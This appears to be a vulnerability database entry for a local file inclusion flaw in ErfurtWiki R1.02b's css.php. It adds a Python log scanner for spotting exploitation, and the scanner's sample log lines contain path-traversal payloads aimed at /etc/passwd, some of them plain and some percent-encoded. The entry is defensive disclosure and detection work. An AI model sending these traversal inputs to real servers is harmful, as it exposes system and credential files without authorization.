Vendor: ErfurtWiki
By: unohope
CVSS: 7.5 (HIGH)
Vulnerability: Local File Inclusion
CWE: 94
Product Name: ErfurtWiki
Affected Version From: R1.02b
Affected Version To: R1.02b
Patch Exists: Yes
Related CWE: N/A
CPE: a:erfurtwiki:erfurtwiki:1.02b
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerability
ErfurtWiki is vulnerable to local file inclusion. The 'css.php' script does not properly sanitize user-supplied input in the 'ewiki_id' parameter, so an attacker who supplies a malicious 'ewiki_id' value in a GET request to 'css.php' can include local files on the web server. This can be exploited to view sensitive files on the web server, such as '/etc/passwd'.
Mitigation:
The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of ErfurtWiki.
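For hosts that cannot be upgraded immediately, the following added example (not part of the original advisory or of ErfurtWiki's code) scans web access logs for requests to 'css.php' whose 'ewiki_id' value looks like a file path. The log lines are constructed samples, and the rule that legitimate 'ewiki_id' values never contain traversal sequences or start with a path separator is an assumption to adjust per site.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /wiki/css.php?ewiki_id=Default HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /wiki/css.php?ewiki_id=../../../../etc/passwd HTTP/1.1" 200 1843',
    '192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET /wiki/css.php?ewiki_id=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843',
    '192.0.2.11 - - [01/Jan/2024:10:00:12 +0000] "GET /wiki/css.php?ewiki_id=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1843',
    '192.0.2.12 - - [01/Jan/2024:10:01:00 +0000] "GET /wiki/index.php?id=FrontPage HTTP/1.1" 200 9000',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate ewiki_id never contains "../", a leading path
# separator, or a NUL byte.
SUSPICIOUS_RE = re.compile(r'\.\.[\\/]|^[\\/]|\x00')


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so layered encodings are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_ewiki_id(line):
    """Return the decoded ewiki_id if the request to css.php looks like a path, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/css.php"):
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get("ewiki_id", []):
        value = fully_decode(raw)
        if SUSPICIOUS_RE.search(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every suspicious request."""
    hits = [(n, suspicious_ewiki_id(line)) for n, line in enumerate(lines, 1)]
    return [(n, value) for n, value in hits if value is not None]


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious ewiki_id {value!r}")
```

A hit that was answered with status 200 and a response size different from the normal stylesheet is the case to review first.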